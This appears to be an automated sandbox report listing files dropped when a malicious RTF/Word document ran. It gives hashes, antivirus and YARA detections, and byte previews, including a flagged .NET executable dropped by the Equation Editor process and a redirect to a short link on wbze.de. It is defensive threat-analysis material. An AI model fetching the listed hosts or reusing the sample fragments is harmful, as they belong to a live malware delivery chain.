                                                    SSDEEP:6:DiSkVOq2PP2nKuAl9OmbnIFUt86i5Zmw+6iTkwOP2nKuAl9OmbjLJ:DiHOvWHAahFUt86i5/+6iT57HAaSJ
                                                    MD5:62311E39410AC0DF0EDA87197F494FDF
                                                    SHA1:286E52E2D731030DE742FE801AAF5767C2A16EA2
                                                    SHA-256:B627F3656787CC9467F29E540656B24469E03CCC78073B63E5DFF116911FF822
                                                    SHA-512:806E32CDB5F43AD58906C9A85610EB1A422A74A0E87D9AB505B6E678EEC8A90EE2B5C3163F59641702E8118EBB6555C40650204DD01DAFC5E50511240C055442
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/05/06-14:59:48.602 3900 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/06-14:59:48.604 3900 Recovering log #3.2024/05/06-14:59:48.604 3900 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.008898238653846898
                                                    Encrypted:false
                                                    SSDEEP:3:ImtVnM1xVlt/rt/l3Sxdlt4dV1gt/lop:IiV0xlzaxdX4m1lo
                                                    MD5:3B8BF2F369CA7ABDF0636EE15DDEF161
                                                    SHA1:4B82D483B79B555C62AA17F31F24F43C38F2C80F
                                                    SHA-256:100201408FDCFA835C8699C6C2FCE748C5C3844C386053F9AA7CAD622373BFCA
                                                    SHA-512:457D92EA15FA528E7BE3ED8136A267BD08A4D7866FDD7C353CFEB898F896983B40BB48156DC25D5E00EC118C6309337F3A9344226D1635F94D7F4A122D3DD87E
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3024000, file counter 15, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                    Category:dropped
                                                    Size (bytes):61440
                                                    Entropy (8bit):3.5766603441870006
                                                    Encrypted:false
                                                    SSDEEP:384:neh9dThStELJ8DAcLKuZsLRGlKhsvXh+vSc:fAeZsLQhUSc
                                                    MD5:721C18B3CD785E0C4FB66A26E87DA34C
                                                    SHA1:654A0452D249353639B0DDF1A8DD0DE0726EAB86
                                                    SHA-256:61838AD15EA90607EAA10B778A10F558BF1E6632B6AED9272973FF6D1AA59417
                                                    SHA-512:85594C31617CA42DE77FE048FDB34F0B5AF37E0671989D0D513B315886F518BC86604EAD08F9262F7FBA80D9F31433CD51FC7142795C33DF2D2F0C2F7E6A5DB7
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.315571834030992
                                                    Encrypted:false
                                                    SSDEEP:48:7Mk2iomVmBsmom1COiomwom1Nom1Aiom1RROiom1Com1pom1tiomVPiomgy1qAle:7CCm6rOOhZCPYd49IVXEBodRBkH
                                                    MD5:D1E64C7A3430F2CE9F30E0AA21C98228
                                                    SHA1:6C0F8235D4D91E19F14B20D468774EEAFBCD6D75
                                                    SHA-256:D428BFB22D94211FE8241B0624A6A0EAA759FD98D74A62A58C20949FE58CE831
                                                    SHA-512:FED84778BEE6678725677A1B4727A2B46F5FA1EE5551B4E03AD008ACB1A8C35129737B01ABB300AD820AB5C5F1DCA548A4E8F6BC4F3015783AA10D1DCD58F960
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.... .c........x..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W....X.W.L...y.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):72643
                                                    Entropy (8bit):5.393779678652009
                                                    Encrypted:false
                                                    SSDEEP:768:PCbTjMYOpdyVFWqnPvBRSiRkTIVzY3OX7pWHDyx2UNYyu:AlOpdyVFWcPvBBRkTIdY3mayJK
                                                    MD5:7D19F935942004A2E6AF01218B33B7D7
                                                    SHA1:FC3C42C8CD80A3561FA7595987904489D56D5C22
                                                    SHA-256:1DB417BF2B690ED20C72CBD8B9BF1B253F4500A77C3ED7DFB5EB5AB2922FE2BF
                                                    SHA-512:D344E9566A83CD79B53B769018242833807CA28B92C8996623E54ABD7A780599A51382DB271A2F6E51CB115080E5A02D4967E083DD8E2C693D3CB7C6D5D19491
                                                    Malicious:false
                                                    Preview:4.458.88.FID.2:o:........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.94.FID.2:o:........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.82.FID.2:o:........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.85.FID.2:o:........:F:Aparajita.P:Aparajita.L:&.........................."F:Aparajita.#.99.FID.2:o:........:F:Aparajita-Italic.P:Aparajita Italic.L:&.........................."F:Aparajita.#.95.FID.2:o:........:F:Aparajita-Bold.P:Aparajita Bold.L:&.........................."F:Aparajita.#.108.FID.2:o:........:F:Aparajita-BoldItalic.P:Aparajita Bold Italic.L:&.........................."F:Aparajita.#.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$....
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.02566577083543993
                                                    Encrypted:false
                                                    SSDEEP:6:I3DPc7vI/vxggLRn2R8F2stGv5FRXv//4tfnRujlw//+GtluJ/eRuj:I3DP0mLaTM0vYg3J/
                                                    MD5:FAB8881474C3EE52D22C122C0D4DD313
                                                    SHA1:4DFB830381D6569AB6F190108962F67DC2BABDD1
                                                    SHA-256:207017226D5EAD94C4E64E1BC6B8259C7C12D9BC6ED5516FCA4170E4BBB63D6A
                                                    SHA-512:16A083B3A0210BB8DF6C1E7C327B8E0EEA057B3C938F7AA7C48EE30ACD99929F841CD38DDB0604F61572C751ED6C63F110B826517D112D0FE1505294E7F03A9F
                                                    Malicious:false
                                                    Preview:......M.eFy...z.......G.._.48(.S,...X.F...Fa.q............................p.0.<..@..@.E.h...........>...{H....}f.J.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):753152
                                                    Entropy (8bit):7.820038309246593
                                                    Encrypted:false
                                                    SSDEEP:12288:nYiAEfD23qCSipEKYiE0JCv9XX8qKEcfldi8+LxfIqpW87PKYUsT4e9LIu:YRE72aCShZwJ6ONdi8IfI0zUscc
                                                    MD5:4C8B56B125AE41293AA6028204D44268
                                                    SHA1:21482DB39F9240559957F1FCCC61017D6845407E
                                                    SHA-256:1809301D773302B15457BFA5830B9EEBFBEC989867DB46E9A06882AF386DF130
                                                    SHA-512:BF2D7F663BB2B2FC4AF36524839EE243836B7AB3692861D30F74EE11EB10A4FB05E7E3879EC196750EBF8B05C5284F559C7BC41331D74E105E208101F019A76E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 37%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..j............... ........@.. ....................................@.................................Y...O....................................h..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............|..............@..B........................H........X...F......D.......X............................................0..i........r...p}.....r...p}.....(........}......=(...+..,...(......+,..>(...+..,...(......+...<(...+..,...(......*....0.. .........{......O...%..=.o........o....... (...+..9........O...%.. .o........o...........O...%....o...........(......~......o .......,n.~......o!.....~......o"....Q...............,=....+&......o....sO........oQ...}........X.......i.Y......-...+...r...p}............r;..p}........+...
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:HTML document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):301
                                                    Entropy (8bit):5.200930960818896
                                                    Encrypted:false
                                                    SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPJ1uRKRDFLMU3dywcXaoD:J0+ox0RJWWPpxtNywma+
                                                    MD5:6312E969C0BC711D0E219BC5443CEEDD
                                                    SHA1:9B0617299EA11186BAD6ADC93DFC2E466398D867
                                                    SHA-256:C78DF17F325FEAE84778A9DC3BAA8817D1D5184965F7D10C1E47E7EE2ADC3CDE
                                                    SHA-512:F4C664837B5876F71E984DAFD4ECC9A1A11949B9F50DB8391488F8A3AB477A7CEA7C01527A85A15C8ABA514CE5AEEF718F29DB67257D761CA50D3A388FEA0ED5
                                                    Malicious:false
                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://wbze.de/u7xc">here</a>.</p>.<hr>.<address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address>.</body></html>.
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Rich Text Format data, version 1
                                                    Category:dropped
                                                    Size (bytes):79896
                                                    Entropy (8bit):2.796185182406134
                                                    Encrypted:false
                                                    SSDEEP:1536:xmgkvPbKPLhanYgHlYRkegexNd7lRQ3RCLl1vHSO2UVqQHAHAU:xmgkvP5Y4l4gexNdDQADHS3UoxAU
                                                    MD5:554006B43D2303718CA320BE50657C82
                                                    SHA1:806974CC7E3B723922012693F477BBEF925DFFED
                                                    SHA-256:08A5FB6838C3C5A8D96DE60DDD54076366C8016FE16C00E741A76B00662DA1B1
                                                    SHA-512:BDEBF328014BA95BBC9D9DCD7535718D4DDD1ED9973AEDB062F36B0538F7CF35B756082978AA70EB5FF8DEC75824031C7AEC40B5096D70C712AFE4A1CDEFA34E
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:{\rtf1.............{\*\wzName541791315 \[}.{\43897386./0.,>$[83!?0')-|@?^@^?+([;887``|4!2!?.?#|.1?~0~(_%)[!%'=7|??~>%??6.38|].5=*$?/?<,4-&^?10<%?1??+-6|<.^;2=2=9.@%+;%_|?9-46^%/].<[%5_^$1.'@,,).$!.356~..?98(2$?'=_?>(5^?.]<22138*?_6.+`4@/7|=?/(?!4?*.^/.?.-,4.'..*:^<^|96[#76~,0~`.?%4)[%_?&&50^#5.921%/%|'_0,>6.2%`3='77>9<>^8*'$!&:8';4.0[$~.;413.9>'.,'^5`)`1.:0?.)?<,.^3%.>$9~3.4.[%:649=?$``^_]%].)@%..4?&`|][[?.;2/-@@<2&4?.,,?^=017?_'.<?^?3?(|)-?9..-0(]?%`;-0531;.$90)1~-#+.|?.+?=*..$.2`%^.>?&/>>7[87?)2:3%5,<?#4!->8-.^_..__]_.3*-*;]+<1/,?@8?+0@%5|.0.:@.4[][?80$&]?&.?..[~4&>(]<5-'_?+.4|#@2~>><<++@(<9#|/9'>%'[@*.7>$[._#('~6<&.%(+7=1!.?3.9,?..)=_?;<4.<`[,.75_*[->.>@#89)+>&%?.;33|(=:??0-5*^,?0%|!4_7_6$.:%??..7437__;86|?+5?,,^>(~;|.-6&=1~?3~9;?.?.($|1+,?3%3?)?[2%??6?77?;#,?>-6?3849?5!9@7?7^3?76357-'=??-([-|/(6|?7;7(._?;1:.?)<%'`8??./@`0?/6)%?=.,6>?1<~?6(]'|1_|'<.;~9[97@?,.~2>|)=%37)?`8;(??,?.9(#`%/81?#^^88?.?]`^53?[^,|.|.^_222^?<?^,?1||*=].?%^<>.-?]+%:.@'5.+;;>/`#8?%>]:(*%?~]>.%^==>0_8,4???>?6|/<
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):1505804
                                                    Entropy (8bit):0.608714479340621
                                                    Encrypted:false
                                                    SSDEEP:768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
                                                    MD5:476C7C2F309C957F6428D04E94C4F64A
                                                    SHA1:F1B0FA252BABFB7002DC87069A436AD71BDA532F
                                                    SHA-256:C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
                                                    SHA-512:C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
                                                    Malicious:false
                                                    Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):1505804
                                                    Entropy (8bit):0.608714479340621
                                                    Encrypted:false
                                                    SSDEEP:768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
                                                    MD5:476C7C2F309C957F6428D04E94C4F64A
                                                    SHA1:F1B0FA252BABFB7002DC87069A436AD71BDA532F
                                                    SHA-256:C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
                                                    SHA-512:C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
                                                    Malicious:false
                                                    Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Rich Text Format data, version 1
                                                    Category:dropped
                                                    Size (bytes):79896
                                                    Entropy (8bit):2.796185182406134
                                                    Encrypted:false
                                                    SSDEEP:1536:xmgkvPbKPLhanYgHlYRkegexNd7lRQ3RCLl1vHSO2UVqQHAHAU:xmgkvP5Y4l4gexNdDQADHS3UoxAU
                                                    MD5:554006B43D2303718CA320BE50657C82
                                                    SHA1:806974CC7E3B723922012693F477BBEF925DFFED
                                                    SHA-256:08A5FB6838C3C5A8D96DE60DDD54076366C8016FE16C00E741A76B00662DA1B1
                                                    SHA-512:BDEBF328014BA95BBC9D9DCD7535718D4DDD1ED9973AEDB062F36B0538F7CF35B756082978AA70EB5FF8DEC75824031C7AEC40B5096D70C712AFE4A1CDEFA34E
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:{\rtf1.............{\*\wzName541791315 \[}.{\43897386./0.,>$[83!?0')-|@?^@^?+([;887``|4!2!?.?#|.1?~0~(_%)[!%'=7|??~>%??6.38|].5=*$?/?<,4-&^?10<%?1??+-6|<.^;2=2=9.@%+;%_|?9-46^%/].<[%5_^$1.'@,,).$!.356~..?98(2$?'=_?>(5^?.]<22138*?_6.+`4@/7|=?/(?!4?*.^/.?.-,4.'..*:^<^|96[#76~,0~`.?%4)[%_?&&50^#5.921%/%|'_0,>6.2%`3='77>9<>^8*'$!&:8';4.0[$~.;413.9>'.,'^5`)`1.:0?.)?<,.^3%.>$9~3.4.[%:649=?$``^_]%].)@%..4?&`|][[?.;2/-@@<2&4?.,,?^=017?_'.<?^?3?(|)-?9..-0(]?%`;-0531;.$90)1~-#+.|?.+?=*..$.2`%^.>?&/>>7[87?)2:3%5,<?#4!->8-.^_..__]_.3*-*;]+<1/,?@8?+0@%5|.0.:@.4[][?80$&]?&.?..[~4&>(]<5-'_?+.4|#@2~>><<++@(<9#|/9'>%'[@*.7>$[._#('~6<&.%(+7=1!.?3.9,?..)=_?;<4.<`[,.75_*[->.>@#89)+>&%?.;33|(=:??0-5*^,?0%|!4_7_6$.:%??..7437__;86|?+5?,,^>(~;|.-6&=1~?3~9;?.?.($|1+,?3%3?)?[2%??6?77?;#,?>-6?3849?5!9@7?7^3?76357-'=??-([-|/(6|?7;7(._?;1:.?)<%'`8??./@`0?/6)%?=.,6>?1<~?6(]'|1_|'<.;~9[97@?,.~2>|)=%37)?`8;(??,?.9(#`%/81?#^^88?.?]`^53?[^,|.|.^_222^?<?^,?1||*=].?%^<>.-?]+%:.@'5.+;;>/`#8?%>]:(*%?~]>.%^==>0_8,4???>?6|/<
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):1505804
                                                    Entropy (8bit):0.611760173242012
                                                    Encrypted:false
                                                    SSDEEP:768:/jKn4RpbfoTGRFm2GWWDEXM4espe2B/nwyFwx+VjRQ9+c4AgD7PHj8bKYEqQtVxY:/jhRpbfoaRFvGWW6/4DADMXIok/2GiEs
                                                    MD5:D69C22A341E111FEEA69DF6D8C655D60
                                                    SHA1:AC862337F2EFA43627508927F5052CE694012206
                                                    SHA-256:05B2053BF1D070D6034B45CD79B54D80DA3C6D88D016671A345E75048B1A68DB
                                                    SHA-512:D4DB33ED046B3C9BA09C4B3FEAC17B1FE2E75FCE67F4154FD795D504708C295A1E3C8331ED3D6C3EE9950C936C4CC25B5D690558C26F2E1F7771BD5EB275822C
                                                    Malicious:false
                                                    Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):1505804
                                                    Entropy (8bit):0.608714479340621
                                                    Encrypted:false
                                                    SSDEEP:768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
                                                    MD5:476C7C2F309C957F6428D04E94C4F64A
                                                    SHA1:F1B0FA252BABFB7002DC87069A436AD71BDA532F
                                                    SHA-256:C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
                                                    SHA-512:C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
                                                    Malicious:false
                                                    Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):1505804
                                                    Entropy (8bit):0.608714479340621
                                                    Encrypted:false
                                                    SSDEEP:768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
                                                    MD5:476C7C2F309C957F6428D04E94C4F64A
                                                    SHA1:F1B0FA252BABFB7002DC87069A436AD71BDA532F
                                                    SHA-256:C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
                                                    SHA-512:C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
                                                    Malicious:false
                                                    Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):1505804
                                                    Entropy (8bit):0.608714479340621
                                                    Encrypted:false
                                                    SSDEEP:768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
                                                    MD5:476C7C2F309C957F6428D04E94C4F64A
                                                    SHA1:F1B0FA252BABFB7002DC87069A436AD71BDA532F
                                                    SHA-256:C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
                                                    SHA-512:C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
                                                    Malicious:false
                                                    Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):1505804
                                                    Entropy (8bit):0.608714479340621
                                                    Encrypted:false
                                                    SSDEEP:768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
                                                    MD5:476C7C2F309C957F6428D04E94C4F64A
                                                    SHA1:F1B0FA252BABFB7002DC87069A436AD71BDA532F
                                                    SHA-256:C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
                                                    SHA-512:C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
                                                    Malicious:false
                                                    Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):9551872
                                                    Entropy (8bit):1.2121360229950167
                                                    Encrypted:false
                                                    SSDEEP:12288:W0+zdju+zJ+zYje+zc+zfjX8VK+z2/M+zG+zK/s+zK+zY/O8Vu+zojs8jKvEVMwS:wzdzcz8zRzotzsz3z4zTzqFzoBH
                                                    MD5:05B2D6C1492004BFA223564604D9F32A
                                                    SHA1:1EBE91D063F36A8B5CEF33650A1A09BF5B5BFCE8
                                                    SHA-256:880A489BB41101557FDE655ED846B40E54A075FEE3ACFD182403175F3C8F300A
                                                    SHA-512:9386B456690F77D7EE7A740B8F8C21330B4866F574A0A20306048DC31CBBBB702828D514C546EB932B239FE1845A43D9A84327F499C81CB309237B296C65714B
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:......................>............................................1..........I.......F.......F.......B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...............................................................................................m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~............................&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...1...1...1...1...1...1...1...1...1..................................H...G....................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...................K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):7168
                                                    Entropy (8bit):3.514021831071716
                                                    Encrypted:false
                                                    SSDEEP:96:IlhT+/4UhIImqb2Av+LXVUIsPb9K4DJTyc5xd5pqVawIGzQH9mwARU+uzj:WhKvmc2AGLlUDDJOc5xd5pG5UmpU+u
                                                    MD5:9BC6D2736E6595BD0125335C6F724AD8
                                                    SHA1:17AA64C7477846BBDD6BA3E489B03452C8BB078D
                                                    SHA-256:C1A2EEF144E57B71C4E5D1D228E82F4413B996EFA61971808613025D61118510
                                                    SHA-512:8B1440FD216C49943C1CF54E246C5E2CECF880FDB7789F4A7781D234EA207EE782DB925C0C6705CBA7DBC591AFF2A50904256DD80A2E09701C8E8AF1F0421C18
                                                    Malicious:false
                                                    Preview:................3.8.9.7.3.8.6.../.0...,.>.$.[.8.3.!.?.0.'.).-.|.@.?.^.@.^.?.+.(.[.;.8.8.7.`.`.|.4.!.2.!.?...?.#.|...1.?.~.0.~.(._.%.).[.!.%.'.=.7.|.?.?.~.>.%.?.?.6...3.8.|.]...5.=.*.$.?./.?.<.,.4.-.&.^.?.1.0.<.%.?.1.?.?.+.-.6.|.<...^.;.2.=.2.=.9...@.%.+.;.%._.|.?.9.-.4.6.^.%./.]...<.[.%.5._.^.$.1...'.@.,.,.)...$.!...3.5.6.~.....?.9.8.(.2.$.?.'.=._.?.>.(.5.^.?...].<.2.2.1.3.8.*.?._.6...+.`.4.@./.7.|.=.?./.(.?.!.4.?.*...^./...?...-.,.4...'.....*.:.^.<.^.|.9.6.[.#.7.6.~.,.0.~.`...?.%.4.).[.%._.?.&.&.5.0.^.#.5...9.2.1.%./.%.|.'._.0.,.>.6...2.%.`.3.=.'.7.7.>.9.<.>.^.8.*.'.$.!.&.:.8.'.;.4...0.[.$.~...;.4.1.3...9.>.'...,.'.^.5.`.).`.1...:.0.?...).?.<.,...^.3.%...>.$.9.~.3...4...[.%.:.6.4.9.=.?.$.`.`.^._.].%.]...).@.%.....4.?.&.`.|.].[.[.?...;.2./.-.@.@.<.2.&.4.?...,.,.?.^.=.0.1.7.?._.'...<.?.^.?.3.?.(.|.).-.?.9.....-.0.(.].?.%.`.;.-.0.5.3.1.;...$.9.0.).1.~.-.#.+...|.?...+.?.=.*.....$...2.`.%.^...>.?.&./.>.>.7.[.8.7.?.).2.:.3.%.5.,.<.?.#.4.!.-.>.8.-...^._....._._.]._...3.*.-.*.;.].+.<.1./.,.?.
